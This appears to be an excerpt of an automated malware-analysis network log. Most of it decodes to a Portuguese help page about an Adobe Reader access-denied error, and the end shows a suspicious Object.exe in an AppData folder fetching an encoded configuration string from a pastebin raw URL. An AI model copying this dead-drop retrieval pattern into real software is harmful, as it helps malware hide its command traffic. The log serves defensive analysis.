                                                                                              2021-12-13 23:57:31 UTC8127INData Raw: 31 30 31 61 0d 0a 3c 70 20 63 6c 61 73 73 3d 22 67 74 2d 62 6c 6f 63 6b 20 65 6e 74 72 79 2d 6d 65 74 61 22 3e 3c 74 69 6d 65 20 63 6c 61 73 73 3d 22 65 6e 74 72 79 2d 74 69 6d 65 22 20 64 61 74 65 74 69 6d 65 3d 22 32 30 32 30 2d 30 38 2d 31 39 54 31 36 3a 33 37 3a 34 36 2b 30 30 3a 30 30 22 3e 31 39 20 64 65 20 61 67 6f 73 74 6f 20 64 65 20 32 30 32 30 3c 2f 74 69 6d 65 3e 62 79 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 65 6e 74 72 79 2d 61 75 74 68 6f 72 22 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 65 62 73 65 74 6e 65 74 2e 6e 65 74 2f 70 74 2f 61 75 74 6f 72 2f 62 69 6c 6c 79 31 36 2f 22 20 63 6c 61 73 73 3d 22 65 6e 74 72 79 2d 61 75 74 68 6f 72 2d 6c 69 6e 6b 22 20 72 65 6c 3d 22 61 75 74 68 6f 72 22 3e 3c 73 70 61 6e 20 63 6c 61 73
                                                                                              Data Ascii: 101a<p class="gt-block entry-meta"><time class="entry-time" datetime="2020-08-19T16:37:46+00:00">19 de agosto de 2020</time>by <span class="entry-author"><a href="https://websetnet.net/pt/autor/billy16/" class="entry-author-link" rel="author"><span clas
                                                                                              2021-12-13 23:57:31 UTC8131INData Raw: 31 30 30 30 0d 0a 65 73 73 c3 a1 2d 6c 6f 2e 3c 2f 70 3e 0a 3c 70 3e 43 61 73 6f 20 69 73 73 6f 20 61 63 6f 6e 74 65 c3 a7 61 2c 20 64 65 73 61 74 69 76 65 20 61 6c 67 75 6e 73 20 72 65 63 75 72 73 6f 73 20 61 6e 74 69 76 c3 ad 72 75 73 20 65 20 74 65 6e 74 65 20 6e 6f 76 61 6d 65 6e 74 65 2e 20 41 6c c3 a9 6d 20 64 69 73 73 6f 2c 20 76 6f 63 c3 aa 20 70 6f 64 65 20 74 65 6e 74 61 72 20 64 65 73 61 74 69 76 61 72 20 73 65 75 20 61 6e 74 69 76 c3 ad 72 75 73 20 70 6f 72 20 63 6f 6d 70 6c 65 74 6f 20 65 20 76 65 72 20 73 65 20 66 75 6e 63 69 6f 6e 61 2e 20 c3 80 73 20 76 65 7a 65 73 2c 20 69 73 73 6f 20 70 6f 64 65 20 6e c3 a3 6f 20 73 65 72 20 73 75 66 69 63 69 65 6e 74 65 2c 20 65 6e 74 c3 a3 6f 20 76 6f 63 c3 aa 20 74 65 72 c3 a1 20 71 75 65 20 72 65 6d
                                                                                              Data Ascii: 1000ess-lo.</p><p>Caso isso acontea, desative alguns recursos antivrus e tente novamente. Alm disso, voc pode tentar desativar seu antivrus por completo e ver se funciona. s vezes, isso pode no ser suficiente, ento voc ter que rem
                                                                                              2021-12-13 23:57:31 UTC8135INData Raw: 66 66 61 0d 0a 74 69 76 6f 20 6e 75 6e 63 61 20 74 69 76 65 73 73 65 20 73 69 64 6f 20 69 6e 73 74 61 6c 61 64 6f 2e 3c 2f 70 3e 0a 3c 70 3e 41 67 6f 72 61 20 c3 a9 20 73 c3 b3 20 69 6e 73 74 61 6c 61 72 20 61 20 c3 ba 6c 74 69 6d 61 20 76 65 72 73 c3 a3 6f 20 64 6f 20 41 64 6f 62 65 20 52 65 61 64 65 72 20 65 20 76 65 72 69 66 69 63 61 72 20 73 65 20 6f 20 70 72 6f 62 6c 65 6d 61 20 70 65 72 73 69 73 74 65 2e 3c 2f 70 3e 0a 3c 70 3e 3c 69 6d 67 20 73 72 63 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 73 76 67 2b 78 6d 6c 2c 25 33 43 73 76 67 25 32 30 78 6d 6c 6e 73 3d 27 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 27 25 32 30 77 69 64 74 68 3d 27 31 27 25 32 30 68 65 69 67 68 74 3d 27 31 27 25 33 45 25 33 43 2f 73 76 67 25 33
                                                                                              Data Ascii: ffativo nunca tivesse sido instalado.</p><p>Agora s instalar a ltima verso do Adobe Reader e verificar se o problema persiste.</p><p><img src="data:image/svg+xml,%3Csvg%20xmlns='http://www.w3.org/2000/svg'%20width='1'%20height='1'%3E%3C/svg%3
                                                                                              2021-12-13 23:57:31 UTC8139INData Raw: 65 64 32 0d 0a 3c 2f 73 74 72 6f 6e 67 3e 2e 3c 2f 6c 69 3e 0a 3c 6c 69 3e 41 67 6f 72 61 20 76 c3 a1 20 70 61 72 61 20 6f 20 3c 73 74 72 6f 6e 67 3e 45 64 69 74 61 72 26 67 74 3b 20 50 72 65 66 65 72 c3 aa 6e 63 69 61 73 26 67 74 3b 20 53 65 67 75 72 61 6e c3 a7 61 20 28 61 70 72 69 6d 6f 72 61 64 6f 29 3c 2f 73 74 72 6f 6e 67 3e 2e 3c 2f 6c 69 3e 0a 3c 6c 69 3e 44 65 73 6d 61 72 63 61 72 20 3c 73 74 72 6f 6e 67 3e 41 74 69 76 61 72 20 6d 6f 64 6f 20 70 72 6f 74 65 67 69 64 6f 20 6e 61 20 69 6e 69 63 69 61 6c 69 7a 61 c3 a7 c3 a3 6f 3c 2f 73 74 72 6f 6e 67 3e 20 63 61 69 78 61 20 64 65 20 73 65 6c 65 c3 a7 c3 a3 6f 2e 3c 2f 6c 69 3e 0a 3c 2f 6f 6c 3e 0a 3c 70 3e 56 6f 63 c3 aa 20 74 61 6d 62 c3 a9 6d 20 70 6f 64 65 20 64 65 73 61 74 69 76 61 72 20 6f 20
                                                                                              Data Ascii: ed2</strong>.</li><li>Agora v para o <strong>Editar&gt; Preferncias&gt; Segurana (aprimorado)</strong>.</li><li>Desmarcar <strong>Ativar modo protegido na inicializao</strong> caixa de seleo.</li></ol><p>Voc tambm pode desativar o
                                                                                              2021-12-13 23:57:31 UTC8142INData Raw: 31 31 33 33 0d 0a 3c 69 6d 67 20 74 69 74 6c 65 3d 22 6d 6f 76 65 72 20 6f 20 61 72 71 75 69 76 6f 22 20 73 72 63 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 73 76 67 2b 78 6d 6c 2c 25 33 43 73 76 67 25 32 30 78 6d 6c 6e 73 3d 27 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 27 25 32 30 77 69 64 74 68 3d 27 31 27 25 32 30 68 65 69 67 68 74 3d 27 31 27 25 33 45 25 33 43 2f 73 76 67 25 33 45 22 20 61 6c 74 3d 22 6d 6f 76 65 72 20 6f 20 61 72 71 75 69 76 6f 20 70 64 66 20 4f 63 6f 72 72 65 75 20 75 6d 20 65 72 72 6f 20 61 6f 20 61 62 72 69 72 20 65 73 74 65 20 64 6f 63 75 6d 65 6e 74 6f 20 61 63 65 73 73 6f 20 6e 65 67 61 64 6f 22 20 64 61 74 61 2d 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 73 74 61 74 69 63 61 6c 6c 79 2e
                                                                                              Data Ascii: 1133<img title="mover o arquivo" src="data:image/svg+xml,%3Csvg%20xmlns='http://www.w3.org/2000/svg'%20width='1'%20height='1'%3E%3C/svg%3E" alt="mover o arquivo pdf Ocorreu um erro ao abrir este documento acesso negado" data-src="https://cdn.statically.
                                                                                              2021-12-13 23:57:31 UTC8147INData Raw: 31 30 30 31 0d 0a 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 73 74 61 74 69 63 61 6c 6c 79 2e 69 6f 2f 69 6d 67 2f 77 65 62 73 65 74 6e 65 74 2e 6e 65 74 2f 66 3d 61 75 74 6f 25 32 43 71 3d 36 30 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 75 70 6c 6f 61 64 73 2f 32 30 32 30 2f 30 38 2f 74 68 65 72 65 2d 77 61 73 2d 61 6e 2d 65 72 72 6f 72 2d 6f 70 65 6e 69 6e 67 2d 74 68 69 73 2d 64 6f 63 75 6d 65 6e 74 2d 61 63 63 65 73 73 2d 64 65 6e 69 65 64 2d 64 65 74 61 69 6c 73 2d 31 2e 70 6e 67 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 20 72 65 6c 3d 22 6e 6f 72 65 66 65 72 72 65 72 20 6e 6f 6f 70 65 6e 65 72 22 3e 3c 69 6d 67 20 74 69 74 6c 65 3d 22 64 65 74 61 6c 68 65 73 22 20 73 72 63 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 73 76 67 2b 78
                                                                                              Data Ascii: 1001<a href="https://cdn.statically.io/img/websetnet.net/f=auto%2Cq=60/wp-content/uploads/2020/08/there-was-an-error-opening-this-document-access-denied-details-1.png" target="_blank" rel="noreferrer noopener"><img title="detalhes" src="data:image/svg+x
                                                                                              2021-12-13 23:57:31 UTC8151INData Raw: 66 33 63 0d 0a 73 73 6f 20 6e 65 67 61 64 6f 3c 2f 65 6d 3e 20 6d 65 6e 73 61 67 65 6d 20 73 65 20 6f 20 70 61 69 6e 65 6c 20 64 65 20 76 69 73 75 61 6c 69 7a 61 c3 a7 c3 a3 6f 20 65 73 74 69 76 65 72 20 61 74 69 76 61 64 6f 20 65 6d 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 69 6e 64 6f 77 73 72 65 70 6f 72 74 2e 63 6f 6d 2f 77 69 6e 64 6f 77 73 2d 65 78 70 6c 6f 72 65 72 2d 63 72 61 73 68 2d 72 69 67 68 74 2d 63 6c 69 63 6b 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 20 72 65 6c 3d 22 6e 6f 72 65 66 65 72 72 65 72 20 6e 6f 6f 70 65 6e 65 72 22 3e 46 69 6c 65 20 45 78 70 6c 6f 72 65 72 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 70 3e 49 73 73 6f 20 70 6f 64 65 20 73 65 72 20 75 6d 61 20 66 61 6c 68 61 20 69 72 72 69 74 61 6e 74 65 20 65 20
                                                                                              Data Ascii: f3csso negado</em> mensagem se o painel de visualizao estiver ativado em <a href="https://windowsreport.com/windows-explorer-crash-right-click/" target="_blank" rel="noreferrer noopener">File Explorer</a>.</p><p>Isso pode ser uma falha irritante e
                                                                                              2021-12-13 23:57:31 UTC8154INData Raw: 31 30 39 62 0d 0a 3c 61 20 63 6c 61 73 73 3d 22 68 65 61 74 65 6f 72 5f 73 73 73 5f 62 75 74 74 6f 6e 5f 74 77 69 74 74 65 72 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 74 77 69 74 74 65 72 2e 63 6f 6d 2f 69 6e 74 65 6e 74 2f 74 77 65 65 74 3f 74 65 78 74 3d 46 69 78 25 33 41 25 32 30 54 68 65 72 65 25 32 30 77 61 73 25 32 30 61 6e 25 32 30 65 72 72 6f 72 25 32 30 6f 70 65 6e 69 6e 67 25 32 30 74 68 69 73 25 32 30 64 6f 63 75 6d 65 6e 74 26 61 6d 70 3b 75 72 6c 3d 68 74 74 70 73 25 33 41 25 32 46 25 32 46 77 65 62 73 65 74 6e 65 74 2e 6e 65 74 25 32 46 66 69 78 2d 74 68 65 72 65 2d 77 61 73 2d 61 6e 2d 65 72 72 6f 72 2d 6f 70 65 6e 69 6e 67 2d 74 68 69 73 2d 64 6f 63 75 6d 65 6e 74 25 32 46 22 20 74 69 74 6c 65 3d 22 54 77 69 74 74 65 72 22 20 72 65 6c
                                                                                              Data Ascii: 109b<a class="heateor_sss_button_twitter" href="http://twitter.com/intent/tweet?text=Fix%3A%20There%20was%20an%20error%20opening%20this%20document&amp;url=https%3A%2F%2Fwebsetnet.net%2Ffix-there-was-an-error-opening-this-document%2F" title="Twitter" rel
                                                                                              2021-12-13 23:57:31 UTC8159INData Raw: 66 61 34 0d 0a 3c 70 61 74 68 20 64 3d 22 4d 36 2e 32 32 37 20 31 32 2e 36 31 68 34 2e 31 39 76 31 33 2e 34 38 68 2d 34 2e 31 39 56 31 32 2e 36 31 7a 6d 32 2e 30 39 35 2d 36 2e 37 61 32 2e 34 33 20 32 2e 34 33 20 30 20 30 20 31 20 30 20 34 2e 38 36 63 2d 31 2e 33 34 34 20 30 2d 32 2e 34 32 38 2d 31 2e 30 39 2d 32 2e 34 32 38 2d 32 2e 34 33 73 31 2e 30 38 34 2d 32 2e 34 33 20 32 2e 34 32 38 2d 32 2e 34 33 6d 34 2e 37 32 20 36 2e 37 68 34 2e 30 32 76 31 2e 38 34 68 2e 30 35 38 63 2e 35 36 2d 31 2e 30 35 38 20 31 2e 39 32 37 2d 32 2e 31 37 36 20 33 2e 39 36 35 2d 32 2e 31 37 36 20 34 2e 32 33 38 20 30 20 35 2e 30 32 20 32 2e 37 39 32 20 35 2e 30 32 20 36 2e 34 32 76 37 2e 33 39 35 68 2d 34 2e 31 38 33 76 2d 36 2e 35 36 63 30 2d 31 2e 35 36 34 2d 2e 30 33 2d
                                                                                              Data Ascii: fa4<path d="M6.227 12.61h4.19v13.48h-4.19V12.61zm2.095-6.7a2.43 2.43 0 0 1 0 4.86c-1.344 0-2.428-1.09-2.428-2.43s1.084-2.43 2.428-2.43m4.72 6.7h4.02v1.84h.058c.56-1.058 1.927-2.176 3.965-2.176 4.238 0 5.02 2.792 5.02 6.42v7.395h-4.183v-6.56c0-1.564-.03-
                                                                                              2021-12-13 23:57:31 UTC8163INData Raw: 65 38 65 0d 0a 3c 61 20 63 6c 61 73 73 3d 22 68 65 61 74 65 6f 72 5f 73 73 73 5f 62 75 74 74 6f 6e 5f 6d 69 78 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 6d 69 78 2e 63 6f 6d 2f 6d 69 78 69 74 3f 75 72 6c 3d 68 74 74 70 73 25 33 41 25 32 46 25 32 46 77 65 62 73 65 74 6e 65 74 2e 6e 65 74 25 32 46 66 69 78 2d 74 68 65 72 65 2d 77 61 73 2d 61 6e 2d 65 72 72 6f 72 2d 6f 70 65 6e 69 6e 67 2d 74 68 69 73 2d 64 6f 63 75 6d 65 6e 74 25 32 46 22 20 74 69 74 6c 65 3d 22 4d 69 78 22 20 72 65 6c 3d 22 6e 6f 66 6f 6c 6c 6f 77 20 6e 6f 6f 70 65 6e 65 72 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 33 32 70 78 21 69 6d 70 6f 72 74 61 6e 74 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 6e 6f 6e 65 3b 64 69 73 70 6c
                                                                                              Data Ascii: e8e<a class="heateor_sss_button_mix" href="https://mix.com/mixit?url=https%3A%2F%2Fwebsetnet.net%2Ffix-there-was-an-error-opening-this-document%2F" title="Mix" rel="nofollow noopener" target="_blank" style="font-size:32px!important;box-shadow:none;displ
                                                                                              2021-12-13 23:57:31 UTC8166INData Raw: 31 31 61 38 0d 0a 3c 70 61 74 68 20 66 69 6c 6c 3d 22 23 66 66 66 22 20 64 3d 22 4d 31 36 2e 30 30 35 20 36 2e 32 34 34 63 32 2e 39 32 37 20 30 20 35 2e 38 35 34 2d 2e 30 30 32 20 38 2e 37 38 32 20 30 20 31 2e 33 39 36 2e 30 30 32 20 32 2e 31 39 35 2e 37 38 20 32 2e 31 38 38 20 32 2e 31 36 35 2d 2e 30 31 35 20 32 2e 34 38 35 2e 31 31 36 20 34 2e 39 38 37 2d 2e 31 31 20 37 2e 34 35 36 2d 2e 37 35 20 38 2e 32 30 34 2d 31 30 2e 30 32 37 20 31 32 2e 36 30 37 2d 31 36 2e 39 31 20 38 2e 30 36 34 2d 33 2e 30 38 36 2d 32 2e 30 33 36 2d 34 2e 38 32 2d 34 2e 39 32 35 2d 34 2e 39 31 37 2d 38 2e 36 37 32 2d 2e 30 36 2d 32 2e 33 34 2d 2e 30 33 34 2d 34 2e 36 38 34 2d 2e 30 31 38 2d 37 2e 30 32 35 2e 30 30 38 2d 31 2e 32 31 34 2e 38 31 32 2d 31 2e 39 38 20 32 2e 30 35
                                                                                              Data Ascii: 11a8<path fill="#fff" d="M16.005 6.244c2.927 0 5.854-.002 8.782 0 1.396.002 2.195.78 2.188 2.165-.015 2.485.116 4.987-.11 7.456-.75 8.204-10.027 12.607-16.91 8.064-3.086-2.036-4.82-4.925-4.917-8.672-.06-2.34-.034-4.684-.018-7.025.008-1.214.812-1.98 2.05
                                                                                              2021-12-13 23:57:31 UTC8171INData Raw: 66 62 34 0d 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 68 65 61 74 65 6f 72 5f 73 73 73 5f 73 76 67 20 68 65 61 74 65 6f 72 5f 73 73 73 5f 73 5f 5f 64 65 66 61 75 6c 74 20 68 65 61 74 65 6f 72 5f 73 73 73 5f 73 5f 64 69 67 67 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 36 30 39 34 3b 77 69 64 74 68 3a 33 35 70 78 3b 68 65 69 67 68 74 3a 33 35 70 78 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 39 39 39 70 78 3b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 6f 70 61 63 69 74 79 3a 31 3b 66 6c 6f 61 74 3a 6c 65 66 74 3b 66 6f 6e 74 2d 73 69 7a 65 3a 33 32 70 78 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 6e 6f 6e 65 3b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 66 6f 6e 74 2d 73 69 7a 65
                                                                                              Data Ascii: fb4<span class="heateor_sss_svg heateor_sss_s__default heateor_sss_s_digg" style="background-color:#006094;width:35px;height:35px;border-radius:999px;display:inline-block;opacity:1;float:left;font-size:32px;box-shadow:none;display:inline-block;font-size
                                                                                              2021-12-13 23:57:31 UTC8175INData Raw: 31 30 30 65 0d 0a 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 65 62 73 65 74 6e 65 74 2e 6e 65 74 2f 70 74 2f 66 69 78 2d 65 64 67 65 2d 6e 6f 74 2d 6f 70 65 6e 69 6e 67 2d 70 64 66 2d 66 69 6c 65 73 2d 69 6e 2d 77 69 6e 64 6f 77 73 2d 2d 31 30 2f 22 20 72 65 6c 3d 22 62 6f 6f 6b 6d 61 72 6b 22 20 74 69 74 6c 65 3d 22 43 6f 72 72 65 c3 a7 c3 a3 6f 3a 20 6f 20 45 64 67 65 20 6e c3 a3 6f 20 61 62 72 65 20 61 72 71 75 69 76 6f 73 20 50 44 46 20 65 6d 20 57 69 6e 64 6f 77 73 20 31 30 22 3e 43 6f 72 72 65 c3 a7 c3 a3 6f 3a 20 6f 20 45 64 67 65 20 6e c3 a3 6f 20 61 62 72 65 20 61 72 71 75 69 76 6f 73 20 50 44 46 20 65 6d 20 57 69 6e 64 6f 77 73 20 31 30 20 3c 2f 61 3e 3c 2f 6c 69 3e 0a 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77
                                                                                              Data Ascii: 100e<a href="https://websetnet.net/pt/fix-edge-not-opening-pdf-files-in-windows--10/" rel="bookmark" title="Correo: o Edge no abre arquivos PDF em Windows 10">Correo: o Edge no abre arquivos PDF em Windows 10 </a></li><li><a href="https://w
                                                                                              2021-12-13 23:57:31 UTC8179INData Raw: 66 34 36 0d 0a 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 65 62 73 65 74 6e 65 74 2e 6e 65 74 2f 70 74 2f 63 6f 6d 6f 2d 69 6e 73 74 61 6c 61 72 2d 61 6e 64 72 6f 69 64 2d 61 70 70 2d 61 70 6b 2d 65 6d 2d 73 61 6d 73 75 6e 67 2d 74 69 7a 65 6e 2d 6f 73 2d 64 65 76 69 63 65 2f 22 20 63 6c 61 73 73 3d 22 77 70 70 2d 70 6f 73 74 2d 74 69 74 6c 65 22 20 74 61 72 67 65 74 3d 22 5f 73 65 6c 66 22 20 72 65 6c 3d 22 6e 6f 6f 70 65 6e 65 72 22 3e 43 6f 6d 6f 20 69 6e 73 74 61 6c 61 72 20 6f 20 61 70 6c 69 63 61 74 69 76 6f 20 41 6e 64 72 6f 69 64 20 41 50 4b 20 6e 6f 20 64 69 73 70 6f 73 69 74 69 76 6f 20 53 61 6d 73 75 6e 67 20 54 69 7a 65 6e 20 4f 53 3c 2f 61 3e 3c 2f 6c 69 3e 0a 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 65 62
                                                                                              Data Ascii: f46<a href="https://websetnet.net/pt/como-instalar-android-app-apk-em-samsung-tizen-os-device/" class="wpp-post-title" target="_self" rel="noopener">Como instalar o aplicativo Android APK no dispositivo Samsung Tizen OS</a></li><li><a href="https://web
                                                                                              2021-12-13 23:57:31 UTC8182INData Raw: 66 61 32 0d 0a 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 65 62 73 65 74 6e 65 74 2e 6e 65 74 2f 70 74 2f 65 74 69 71 75 65 74 61 2f 35 67 2f 22 20 63 6c 61 73 73 3d 22 74 61 67 2d 63 6c 6f 75 64 2d 6c 69 6e 6b 20 74 61 67 2d 6c 69 6e 6b 2d 33 38 20 74 61 67 2d 6c 69 6e 6b 2d 70 6f 73 69 74 69 6f 6e 2d 31 22 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 20 38 70 74 3b 22 20 61 72 69 61 2d 6c 61 62 65 6c 3d 22 35 47 20 28 31 20 69 74 65 6d 29 22 3e 35 47 3c 2f 61 3e 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 65 62 73 65 74 6e 65 74 2e 6e 65 74 2f 70 74 2f 65 74 69 71 75 65 74 61 2f 61 6d 61 7a 6f 6e 2d 61 6c 65 78 61 2f 22 20 63 6c 61 73 73 3d 22 74 61 67 2d 63 6c 6f 75 64 2d 6c 69 6e 6b 20 74 61 67 2d 6c 69 6e 6b 2d 33 39
                                                                                              Data Ascii: fa2<a href="https://websetnet.net/pt/etiqueta/5g/" class="tag-cloud-link tag-link-38 tag-link-position-1" style="font-size: 8pt;" aria-label="5G (1 item)">5G</a> <a href="https://websetnet.net/pt/etiqueta/amazon-alexa/" class="tag-cloud-link tag-link-39
                                                                                              2021-12-13 23:57:31 UTC8186INData Raw: 66 66 30 0d 0a 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 65 62 73 65 74 6e 65 74 2e 6e 65 74 2f 70 74 2f 65 74 69 71 75 65 74 61 2f 6c 61 70 74 6f 70 2f 22 20 63 6c 61 73 73 3d 22 74 61 67 2d 63 6c 6f 75 64 2d 6c 69 6e 6b 20 74 61 67 2d 6c 69 6e 6b 2d 33 33 20 74 61 67 2d 6c 69 6e 6b 2d 70 6f 73 69 74 69 6f 6e 2d 32 32 22 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 20 38 70 74 3b 22 20 61 72 69 61 2d 6c 61 62 65 6c 3d 22 6c 61 70 74 6f 70 20 28 31 20 69 74 65 6d 29 22 3e 6c 61 70 74 6f 70 3c 2f 61 3e 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 65 62 73 65 74 6e 65 74 2e 6e 65 74 2f 70 74 2f 65 74 69 71 75 65 74 61 2f 4c 61 73 74 50 61 73 73 2f 22 20 63 6c 61 73 73 3d 22 74 61 67 2d 63 6c 6f 75 64 2d 6c 69 6e 6b 20 74 61
                                                                                              Data Ascii: ff0<a href="https://websetnet.net/pt/etiqueta/laptop/" class="tag-cloud-link tag-link-33 tag-link-position-22" style="font-size: 8pt;" aria-label="laptop (1 item)">laptop</a> <a href="https://websetnet.net/pt/etiqueta/LastPass/" class="tag-cloud-link ta
                                                                                              2021-12-13 23:57:31 UTC8190INData Raw: 31 30 38 36 0d 0a 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 65 62 73 65 74 6e 65 74 2e 6e 65 74 2f 70 74 2f 65 74 69 71 75 65 74 61 2f 76 70 6e 2f 22 20 63 6c 61 73 73 3d 22 74 61 67 2d 63 6c 6f 75 64 2d 6c 69 6e 6b 20 74 61 67 2d 6c 69 6e 6b 2d 34 37 20 74 61 67 2d 6c 69 6e 6b 2d 70 6f 73 69 74 69 6f 6e 2d 34 33 22 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 35 2e 31 37 39 34 38 37 31 37 39 34 38 37 70 74 3b 22 20 61 72 69 61 2d 6c 61 62 65 6c 3d 22 76 70 6e 20 28 34 20 69 74 65 6d 73 29 22 3e 76 70 6e 3c 2f 61 3e 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 65 62 73 65 74 6e 65 74 2e 6e 65 74 2f 70 74 2f 65 74 69 71 75 65 74 61 2f 6a 61 6e 65 6c 61 73 2d 31 30 2f 22 20 63 6c 61 73 73 3d 22 74 61 67 2d 63 6c 6f 75
                                                                                              Data Ascii: 1086<a href="https://websetnet.net/pt/etiqueta/vpn/" class="tag-cloud-link tag-link-47 tag-link-position-43" style="font-size: 15.179487179487pt;" aria-label="vpn (4 items)">vpn</a> <a href="https://websetnet.net/pt/etiqueta/janelas-10/" class="tag-clou
                                                                                              2021-12-13 23:57:31 UTC8194INData Raw: 33 31 36 63 0d 0a 6f 6e 22 3a 32 2c 22 6e 61 6d 65 22 3a 22 57 69 6e 64 6f 77 73 22 2c 22 40 74 79 70 65 22 3a 22 4c 69 73 74 49 74 65 6d 22 7d 5d 2c 22 40 74 79 70 65 22 3a 22 42 72 65 61 64 63 72 75 6d 62 4c 69 73 74 22 2c 22 40 69 64 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 77 65 62 73 65 74 6e 65 74 2e 6e 65 74 5c 2f 66 69 78 2d 74 68 65 72 65 2d 77 61 73 2d 61 6e 2d 65 72 72 6f 72 2d 6f 70 65 6e 69 6e 67 2d 74 68 69 73 2d 64 6f 63 75 6d 65 6e 74 23 62 72 65 61 64 63 72 75 6d 62 73 22 7d 2c 7b 22 40 74 79 70 65 22 3a 22 57 65 62 50 61 67 65 22 2c 22 6e 61 6d 65 22 3a 22 43 6f 72 72 65 c3 a7 c3 a3 6f 3a 20 4f 63 6f 72 72 65 75 20 75 6d 20 65 72 72 6f 20 61 6f 20 61 62 72 69 72 20 65 73 74 65 20 64 6f 63 75 6d 65 6e 74 6f 22 2c 22 70 72 69 6d 61 72 79 49
                                                                                              Data Ascii: 316con":2,"name":"Windows","@type":"ListItem"}],"@type":"BreadcrumbList","@id":"https:\/\/websetnet.net\/fix-there-was-an-error-opening-this-document#breadcrumbs"},{"@type":"WebPage","name":"Correo: Ocorreu um erro ao abrir este documento","primaryI
                                                                                              2021-12-13 23:57:31 UTC8207INData Raw: 30 0d 0a 0d 0a
                                                                                              Data Ascii: 0


                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                              30192.168.2.349793104.23.98.190443C:\Users\user\AppData\Roaming\WEFHWE0-FWEUY-F9WUEFWWEF\BND0WEPWEJFC-9UEWFF\Object.exe
                                                                                              TimestampkBytes transferredDirectionData
                                                                                              2021-12-13 23:57:44 UTC8948OUTGET /raw/p3uk77tC HTTP/1.1
                                                                                              Host: pastebin.com
                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                              User-Agent: Mozilla/3.0 (compatible; Indy Library)
                                                                                              2021-12-13 23:57:44 UTC8948INHTTP/1.1 200 OK
                                                                                              Date: Mon, 13 Dec 2021 23:57:44 GMT
                                                                                              Content-Type: text/plain; charset=utf-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: close
                                                                                              x-frame-options: DENY
                                                                                              x-content-type-options: nosniff
                                                                                              x-xss-protection: 1;mode=block
                                                                                              cache-control: public, max-age=1801
                                                                                              CF-Cache-Status: HIT
                                                                                              Age: 16
                                                                                              Last-Modified: Mon, 13 Dec 2021 23:57:28 GMT
                                                                                              Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 6bd322f219c74e55-FRA
                                                                                              2021-12-13 23:57:44 UTC8948INData Raw: 33 64 0d 0a 44 41 54 41 3a 7b 33 44 32 42 30 44 30 43 30 37 37 31 45 45 35 36 43 31 41 37 38 30 45 46 31 33 3a 33 42 33 30 33 46 34 35 3a 44 42 37 42 38 41 43 41 30 41 33 41 45 41 30 35 33 39 7d 0d 0a
                                                                                              Data Ascii: 3dDATA:{3D2B0D0C0771EE56C1A780EF13:3B303F45:DB7B8ACA0A3AEA0539}
                                                                                              2021-12-13 23:57:44 UTC8948INData Raw: 30 0d 0a 0d 0a
                                                                                              Data Ascii: 0


                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                              31192.168.2.349796104.23.99.190443C:\Users\user\AppData\Roaming\WEFHWE0-FWEUY-F9WUEFWWEF\BND0WEPWEJFC-9UEWFF\Object.exe
                                                                                              TimestampkBytes transferredDirectionData
                                                                                              2021-12-13 23:57:52 UTC8948OUTGET /raw/p3uk77tC HTTP/1.1
                                                                                              Host: pastebin.com
                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                              User-Agent: Mozilla/3.0 (compatible; Indy Library)
                                                                                              2021-12-13 23:57:52 UTC8949INHTTP/1.1 200 OK
